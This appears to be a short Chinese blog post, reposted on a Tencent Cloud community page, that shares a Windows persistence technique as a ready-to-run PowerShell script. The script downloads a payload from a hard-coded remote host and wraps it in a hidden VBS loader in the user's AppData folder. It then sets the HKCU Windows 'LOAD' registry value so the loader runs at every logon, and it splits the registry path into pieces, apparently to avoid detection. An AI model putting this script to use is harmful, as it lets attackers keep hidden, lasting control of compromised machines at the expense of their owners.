分享一个维权手法
#>
#使用Unicorn生成已编码的powershell命令。修改注册表,当用户登录时执行payload
function Add-Persistence()
{
#payload的路径
$payloadurl = "http://192.168.125.106:8000/ghu98hjbs7jhj2"
#保存维权马的路径
$tmpdir = $env:APPDATA;
#vbs路径
$payloadvbsloaderpath = "$tmpdir\_log.vbs"
#下载payload
$payload = (New-Object Net.WebClient).DownloadString($payloadurl)
$vbs = "Set oShell = CreateObject( ""WScript.Shell"" )`r`n"
$vbs += "ps = ""$payload""`r`n"
$vbs += "oShell.run(ps),0,true"
$vbs | Out-File $payloadvbsloaderpath -Force
#隐藏文件
$fileObj = get-item $payloadvbsloaderpath -Force
$fileObj.Attributes = "Hidden"
#新建注册表
$HKCU1 = "HKCU:\"
$HKCU2 = "Software\Microsoft"
$HKCU3 = "\Windows NT\Current"
$HKCU4 = "Version\Windows"
$HKCU = $HKCU1 + $HKCU2 + $HKCU3 + $HKCU4
#操作注册表的值
Set-ItemProperty -Path $HKCU -Name LOAD -Value $payloadvbsloaderpath
}
Add-Persistence本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-12-29,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读